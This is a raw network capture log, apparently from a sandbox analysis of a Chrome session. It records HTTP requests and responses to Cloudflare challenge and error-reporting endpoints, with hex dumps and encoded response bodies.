                                                                                  2024-04-25 16:23:00 UTC1369INData Raw: 79 64 6b 4b 69 2b 72 61 7a 51 31 4e 61 77 74 70 6e 4f 72 64 57 58 6d 39 79 62 77 62 32 6b 33 39 54 48 77 39 54 67 72 61 76 46 38 64 43 2b 76 75 79 7a 38 50 6a 71 71 2f 44 37 39 4e 4c 54 76 64 58 65 33 74 6e 42 2b 76 50 36 31 39 49 4b 2b 77 4c 65 44 4f 55 53 38 4e 37 65 44 64 4d 57 47 51 76 4c 45 52 77 46 38 76 50 64 39 66 37 2b 2b 65 45 62 45 68 77 66 41 50 55 57 2f 41 4c 6d 47 67 41 48 4c 43 41 71 45 41 67 4f 4f 68 63 5a 4d 68 6b 61 44 68 50 33 4d 44 30 57 41 68 4e 47 47 51 49 7a 47 79 55 4b 48 55 55 39 49 52 38 52 50 30 70 42 56 55 4e 4e 44 43 6c 4f 56 69 31 49 4f 52 30 39 4f 54 67 38 50 55 55 32 59 6b 74 59 59 45 42 49 53 6c 6c 62 63 79 70 4c 51 6a 34 70 57 58 4e 47 62 6c 30 76 4e 48 6b 2f 66 58 39 72 62 58 67 39 63 33 4a 6f 61 34 70 6e 68 33 39 74 59
                                                                                  Data Ascii: ydkKi+razQ1NawtpnOrdWXm9ybwb2k39THw9TgravF8dC+vuyz8Pjqq/D79NLTvdXe3tnB+vP619IK+wLeDOUS8N7eDdMWGQvLERwF8vPd9f7++eEbEhwfAPUW/ALmGgAHLCAqEAgOOhcZMhkaDhP3MD0WAhNGGQIzGyUKHUU9IR8RP0pBVUNNDClOVi1IOR09OTg8PUU2YktYYEBISllbcypLQj4pWXNGbl0vNHk/fX9rbXg9c3Joa4pnh39tY
                                                                                  2024-04-25 16:23:00 UTC1369INData Raw: 76 79 61 36 6f 75 37 71 32 72 72 72 50 75 4a 6a 68 72 4c 53 65 70 72 72 62 74 39 6a 6a 70 74 2b 33 70 37 33 4b 77 4d 6e 30 74 63 54 5a 36 4d 4c 52 2b 2f 33 4b 38 37 4b 33 37 2f 62 7a 37 65 34 43 43 73 62 4b 76 65 54 65 7a 65 54 36 43 64 33 38 37 77 37 50 7a 66 45 53 39 2f 6e 78 35 66 77 5a 31 77 6f 64 44 75 51 65 41 50 73 58 39 53 66 6d 49 51 6b 4d 4d 50 73 65 4c 43 4d 4d 44 7a 54 74 42 2f 48 35 38 69 7a 38 46 51 70 41 43 79 39 41 45 78 4a 46 45 51 49 2f 47 54 51 72 41 45 4a 45 44 79 49 75 49 69 6f 6e 4c 52 59 59 4f 79 70 47 53 69 39 62 4f 55 6c 59 56 69 45 77 4c 79 42 44 4a 46 4e 6c 51 43 56 6b 53 45 52 66 51 55 4e 4d 4d 47 68 66 64 45 74 74 4e 6c 6c 78 62 6e 77 37 54 58 74 5a 4f 6d 46 57 63 6a 70 68 64 47 5a 55 66 49 75 48 57 6b 65 42 64 49 4e 74 62 6e
                                                                                  Data Ascii: vya6ou7q2rrrPuJjhrLSeprrbt9jjpt+3p73KwMn0tcTZ6MLR+/3K87K37/bz7e4CCsbKveTezeT6Cd387w7PzfES9/nx5fwZ1wodDuQeAPsX9SfmIQkMMPseLCMMDzTtB/H58iz8FQpACy9AExJFEQI/GTQrAEJEDyIuIionLRYYOypGSi9bOUlYViEwLyBDJFNlQCVkSERfQUNMMGhfdEttNllxbnw7TXtZOmFWcjphdGZUfIuHWkeBdINtbn
                                                                                  2024-04-25 16:23:00 UTC439INData Raw: 76 4c 37 55 77 73 76 41 78 62 53 39 77 4a 36 33 34 4c 54 59 75 2b 44 6f 77 2b 33 79 37 4f 37 44 39 71 37 78 37 66 72 33 39 63 2b 34 2f 64 69 2f 32 63 50 66 35 66 62 57 2b 4f 48 59 43 51 6e 70 7a 67 48 6c 37 2f 37 39 36 75 44 6a 39 51 38 45 42 39 4d 56 35 78 37 61 37 2f 37 31 32 66 7a 36 37 67 45 69 41 2b 6e 6f 41 4f 59 51 44 66 67 52 38 65 6f 6f 37 51 49 75 49 67 6a 31 4c 44 54 31 50 50 67 33 4e 51 4d 73 41 67 35 46 45 52 5a 46 46 77 5a 42 53 53 77 67 43 45 6b 67 4c 54 4d 32 57 44 46 4b 56 42 4d 37 4f 53 34 61 4e 54 31 43 49 54 31 57 55 6c 39 66 61 69 51 68 53 55 70 48 53 55 74 51 51 7a 41 2f 61 44 4a 70 54 7a 67 77 4c 56 56 5a 55 30 73 2b 66 48 46 4c 5a 57 35 39 57 58 31 7a 68 59 74 31 61 30 64 6c 66 45 70 4f 6c 49 46 32 63 31 53 47 61 46 4b 58 68 6c 5a
                                                                                  Data Ascii: vL7UwsvAxbS9wJ634LTYu+Dow+3y7O7D9q7x7fr39c+4/di/2cPf5fbW+OHYCQnpzgHl7/796uDj9Q8EB9MV5x7a7/712fz67gEiA+noAOYQDfgR8eoo7QIuIgj1LDT1PPg3NQMsAg5FERZFFwZBSSwgCEkgLTM2WDFKVBM7OS4aNT1CIT1WUl9faiQhSUpHSUtQQzA/aDJpTzgwLVVZU0s+fHFLZW59WX1zhYt1a0dlfEpOlIF2c1SGaFKXhlZ
                                                                                  2024-04-25 16:23:00 UTC1369INData Raw: 38 65 61 0d 0a 76 7a 35 49 41 54 7a 42 41 6f 46 2f 51 6e 38 4d 67 59 6b 41 67 41 4a 45 53 77 59 43 52 51 77 45 2f 34 59 4f 43 4e 44 48 69 49 58 51 78 38 42 49 30 6b 6d 53 78 67 49 4c 69 4d 39 44 54 4d 52 4e 6a 51 30 4b 79 77 77 50 54 77 34 55 46 4d 65 57 30 52 5a 4e 31 4e 44 58 46 34 35 52 32 41 6e 59 6d 46 6c 5a 48 4a 73 56 6b 52 75 61 32 46 59 55 48 46 6c 63 6b 78 33 59 6c 42 36 65 6d 42 57 63 31 39 2f 52 56 6c 5a 62 55 70 59 67 6d 79 4b 69 31 32 44 6a 49 36 58 6b 58 43 4d 61 6d 31 51 65 70 57 51 6a 6e 35 6b 6b 6e 4a 66 5a 4b 52 37 68 59 32 65 70 6e 32 6f 6a 49 79 6a 73 71 36 70 67 5a 57 4e 70 6e 65 72 6e 72 43 2b 6c 61 6d 66 66 36 4b 79 76 35 65 6c 70 6f 44 49 69 33 2f 4d 72 35 76 4a 70 49 36 79 79 4b 6e 52 7a 37 69 51 30 4e 71 64 70 74 6a 67 6b 39 36
                                                                                  Data Ascii: 8eavz5IATzBAoF/Qn8MgYkAgAJESwYCRQwE/4YOCNDHiIXQx8BI0kmSxgILiM9DTMRNjQ0KywwPTw4UFMeW0RZN1NDXF45R2AnYmFlZHJsVkRua2FYUHFlckx3YlB6emBWc19/RVlZbUpYgmyKi12DjI6XkXCMam1QepWQjn5kknJfZKR7hY2epn2ojIyjsq6pgZWNpnernrC+lamff6Kyv5elpoDIi3/Mr5vJpI6yyKnRz7iQ0Nqdptjgk96
                                                                                  2024-04-25 16:23:00 UTC920INData Raw: 75 59 74 48 50 55 6d 4c 66 77 64 41 6a 44 30 48 69 55 48 4d 67 73 46 4a 53 63 4a 44 44 6b 77 48 77 34 57 4d 52 49 2b 4e 54 30 42 4a 69 41 68 4f 79 38 74 49 6b 59 4b 4b 30 30 65 4c 56 4a 4b 51 68 6f 53 4c 6b 5a 5a 57 6a 4d 64 50 6c 55 34 55 6c 52 6d 4a 7a 70 59 5a 69 6c 45 57 6a 78 6d 54 30 35 31 61 6c 4a 6a 55 47 70 33 52 6c 6b 38 57 44 70 32 4e 30 70 66 57 30 4f 45 67 46 74 59 51 6d 71 4e 6a 6d 71 4f 69 32 39 71 55 33 4e 74 68 32 78 6d 65 58 68 30 62 48 69 4e 64 6c 61 66 61 6e 4a 63 5a 48 69 5a 64 5a 61 68 5a 49 4b 6d 6f 48 75 49 66 6f 65 79 63 34 4b 58 70 6f 43 50 75 62 75 49 73 58 42 31 72 62 53 78 71 36 79 2f 78 34 53 49 65 36 4b 63 69 36 4b 34 78 70 75 36 72 63 75 4e 69 36 2f 50 74 62 65 76 6f 37 72 57 6c 63 66 61 79 36 4c 62 76 62 6e 55 74 65 61 70
                                                                                  Data Ascii: uYtHPUmLfwdAjD0HiUHMgsFJScJDDkwHw4WMRI+NT0BJiAhOy8tIkYKK00eLVJKQhoSLkZZWjMdPlU4UlRmJzpYZilEWjxmT051alJjUGp3Rlk8WDp2N0pfW0OEgFtYQmqNjmqOi29qU3Nth2xmeXh0bHiNdlafanJcZHiZdZahZIKmoHuIfoeyc4KXpoCPubuIsXB1rbSxq6y/x4SIe6Kci6K4xpu6rcuNi6/Ptbevo7rWlcfay6LbvbnUteap


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  13192.168.2.174971835.190.80.14435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:00 UTC541OUTOPTIONS /report/v4?s=4ozS%2FD%2BlhebByb9jaBaCRWoAEncGPbHpc01bkEyWlR9QzWHR%2FB9s%2F%2F50q%2BwlKuLB0VLH2U6N5aT1m2TFYtnVn1eP3Skjt1q0M%2BCesyWR3U00ru6Y6S3N5kKqF3Fs%2FQ%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Origin: https://efe.q39r.com
                                                                                  Access-Control-Request-Method: POST
                                                                                  Access-Control-Request-Headers: content-type
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:00 UTC336INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  access-control-max-age: 86400
                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                  access-control-allow-origin: *
                                                                                  access-control-allow-headers: content-type, content-length
                                                                                  date: Thu, 25 Apr 2024 16:23:00 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  14192.168.2.174971935.190.80.14435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:01 UTC486OUTPOST /report/v4?s=4ozS%2FD%2BlhebByb9jaBaCRWoAEncGPbHpc01bkEyWlR9QzWHR%2FB9s%2F%2F50q%2BwlKuLB0VLH2U6N5aT1m2TFYtnVn1eP3Skjt1q0M%2BCesyWR3U00ru6Y6S3N5kKqF3Fs%2FQ%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 418
                                                                                  Content-Type: application/reports+json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:01 UTC418OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 65 66 65 2e 71 33 39 72 2e 63 6f 6d 2f 65 66 65 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 38 2e 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a
                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":128,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://efe.q39r.com/efe/","sampling_fraction":1.0,"server_ip":"172.67.218.12","status_code":404,"type":"http.error"},"type":"network-error","url":
                                                                                  2024-04-25 16:23:01 UTC168INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  date: Thu, 25 Apr 2024 16:23:00 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  15192.168.2.1749720104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:01 UTC377INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:23:01 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cf-chl-out: PJne1WrUdmKyAtxhH2iwTQ==$QTrQCsEUeQFHswOEOoJZDw==
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facd988a369ed-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.1749721104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:01 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHs HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:02 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:02 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879facddeb3612eb-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 63 08 02 00 00 00 41 ad 54 7d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR8cAT}IDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.1749722104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:02 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/879faccbfe8fb06a/1714062180713/RjvXT6k7-qXYQHs HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:02 UTC200INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:02 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 61
                                                                                  Connection: close
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879face10a54ad77-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:02 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 63 08 02 00 00 00 41 ad 54 7d 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                  Data Ascii: PNGIHDR8cAT}IDAT$IENDB`


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.1749723104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:02 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/879faccbfe8fb06a/1714062180714/7a2eef3f3a2ffe6b8118994333b3f4d3ec1e526af4efd68e8961fa2dd086f191/MGHiH1uFJDsfTgO HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: max-age=0
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:02 UTC143INHTTP/1.1 401 Unauthorized
                                                                                  Date: Thu, 25 Apr 2024 16:23:02 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Content-Length: 1
                                                                                  Connection: close
                                                                                  2024-04-25 16:23:02 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 65 69 37 76 50 7a 6f 76 5f 6d 75 42 47 4a 6c 44 4d 37 50 30 30 2d 77 65 55 6d 72 30 37 39 61 4f 69 57 48 36 4c 64 43 47 38 5a 45 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gei7vPzov_muBGJlDM7P00-weUmr079aOiWH6LdCG8ZEAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                  2024-04-25 16:23:02 UTC1INData Raw: 4a
                                                                                  Data Ascii: J


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.1749725104.17.2.1844435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:03 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1173002416:1714059007:O_UCrCaeb8fNz4-lYcCa6LDflfcxd0RCynsCpjLLiq4/879faccbfe8fb06a/f892c8713b88792 HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 28757
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Content-type: application/x-www-form-urlencoded
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  CF-Challenge: f892c8713b88792
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://challenges.cloudflare.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/2uyjt/0x4AAAAAAAYIhGTHgfwrnf2u/auto/normal
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:23:03 UTC16384OUTData Raw: 76 5f 38 37 39 66 61 63 63 62 66 65 38 66 62 30 36 61 3d 57 69 74 55 72 41 6f 34 4b 43 30 5a 74 41 62 69 6a 7a 71 42 78 45 71 42 24 2d 6f 4d 24 4f 55 4c 74 24 49 70 24 79 55 42 69 71 43 24 71 24 4c 47 55 24 6b 74 24 78 55 6a 4b 6f 38 24 70 55 6c 30 6f 42 6a 24 46 69 47 43 44 6c 4c 55 45 24 6d 24 59 30 24 4e 45 4e 6c 55 55 70 24 63 6b 74 24 70 24 74 30 24 4f 68 46 71 24 6f 2d 63 42 32 48 32 46 24 44 4e 4f 6d 72 74 24 65 74 24 73 24 74 69 6f 6d 24 46 70 4e 45 57 43 24 6a 6b 45 24 6a 70 39 46 33 24 24 61 4d 71 6c 24 79 6b 37 46 6a 77 7a 24 68 61 41 24 6c 25 32 62 41 74 49 46 48 24 41 4e 39 47 56 6a 70 55 7a 45 4b 6e 35 66 34 56 65 47 24 57 42 45 24 77 44 61 47 30 6c 4a 4a 42 44 24 4b 30 61 5a 76 62 47 6e 4c 32 41 49 49 30 34 32 49 6a 53 31 51 41 36 6c 41 51
                                                                                  Data Ascii: v_879faccbfe8fb06a=WitUrAo4KC0ZtAbijzqBxEqB$-oM$OULt$Ip$yUBiqC$q$LGU$kt$xUjKo8$pUl0oBj$FiGCDlLUE$m$Y0$NENlUUp$ckt$p$t0$OhFq$o-cB2H2F$DNOmrt$et$s$tiom$FpNEWC$jkE$jp9F3$$aMql$yk7Fjwz$haA$l%2bAtIFH$AN9GVjpUzEKn5f4VeG$WBE$wDaG0lJJBD$K0aZvbGnL2AII042IjS1QA6lAQ
                                                                                  2024-04-25 16:23:03 UTC12373OUTData Raw: 4e 71 24 59 65 56 73 67 31 45 77 55 6c 24 65 24 41 45 6f 4b 24 42 24 6f 42 65 55 57 74 24 34 24 7a 55 57 77 47 33 24 38 45 42 55 24 42 24 32 24 5a 47 71 34 24 56 24 6c 74 41 6a 74 6c 55 71 74 71 51 24 48 55 42 4b 71 42 24 38 55 59 4b 41 54 24 78 24 77 47 24 36 24 76 55 46 30 71 2d 24 47 69 52 69 6f 6e 24 7a 24 38 74 71 75 67 35 55 4c 24 41 74 24 43 24 77 4b 24 55 24 42 47 57 55 41 5a 24 51 24 57 4b 24 74 24 70 24 4c 6c 24 6a 24 45 45 6f 24 6a 7a 24 73 24 4c 47 71 2d 55 74 24 42 74 71 4d 45 62 24 61 74 24 43 24 6a 24 43 4b 24 38 24 5a 55 77 4b 6f 55 24 49 30 6c 35 6f 30 6f 59 55 59 30 6f 45 24 57 55 71 47 6f 39 47 39 24 24 55 41 70 24 63 24 77 4b 71 48 47 52 34 6a 51 51 41 24 67 24 77 52 69 52 35 74 24 5a 59 6f 67 24 70 35 41 35 71 42 24 33 24 77 47 41 69
                                                                                  Data Ascii: Nq$YeVsg1EwUl$e$AEoK$B$oBeUWt$4$zUWwG3$8EBU$B$2$ZGq4$V$ltAjtlUqtqQ$HUBKqB$8UYKAT$x$wG$6$vUF0q-$GiRion$z$8tqug5UL$At$C$wK$U$BGWUAZ$Q$WK$t$p$Ll$j$EEo$jz$s$LGq-Ut$BtqMEb$at$C$j$CK$8$ZUwKoU$I0l5o0oYUY0oE$WUqGo9G9$$UAp$c$wKqHGR4jQQA$g$wRiR5t$ZYog$p5A5qB$3$wGAi
                                                                                  2024-04-25 16:23:03 UTC350INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:03 GMT
                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  cf-chl-gen: o62bLldysZaDK2bbg7KbBmHZ8WpNKb0yc8QXFa+REsOHORM81ixAsm0WUlJzbKXv$fgqPxWLD0AHK0EqP8Cdaxw==
                                                                                  vary: accept-encoding
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879face65ccbad6a-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:23:03 UTC1019INData Raw: 31 62 37 61 0d 0a 68 61 70 35 74 62 65 42 75 37 36 2f 72 37 50 49 79 62 6d 6c 78 70 2b 73 6e 37 36 52 71 62 33 43 6c 61 79 52 31 36 6d 78 6f 36 6d 6e 79 63 65 36 75 72 72 57 76 63 47 64 34 72 7a 52 30 74 61 70 36 4c 65 6e 33 72 37 78 72 73 65 7a 79 73 72 53 30 74 71 31 31 66 4c 50 75 4d 76 31 39 38 49 44 35 51 50 77 42 4e 37 6a 30 2f 6a 59 2b 73 59 4a 34 67 4c 4f 42 2b 41 46 30 65 49 50 47 39 55 64 2f 4f 6e 62 39 66 54 76 37 42 45 58 34 66 63 5a 49 77 6e 68 47 4f 67 70 36 53 48 35 49 6a 41 77 4a 4f 67 44 4d 50 55 6c 44 78 62 36 4e 2f 6b 35 2f 54 34 43 4e 30 64 42 41 66 6f 46 2f 42 63 2f 54 30 73 6e 4a 67 78 4e 43 6b 45 51 4c 79 68 45 55 7a 6b 4f 48 52 6c 5a 47 6b 30 37 56 6a 4e 42 48 57 55 69 53 53 55 2f 50 79 78 4e 52 69 4a 66 63 45 78 77 53 54 52 4d 62
                                                                                  Data Ascii: 1b7ahap5tbeBu76/r7PIybmlxp+sn76Rqb3ClayR16mxo6mnyce6urrWvcGd4rzR0tap6Len3r7xrsezysrS0tq11fLPuMv198ID5QPwBN7j0/jY+sYJ4gLOB+AF0eIPG9Ud/Onb9fTv7BEX4fcZIwnhGOgp6SH5IjAwJOgDMPUlDxb6N/k5/T4CN0dBAfoF/Bc/T0snJgxNCkEQLyhEUzkOHRlZGk07VjNBHWUiSSU/PyxNRiJfcExwSTRMb
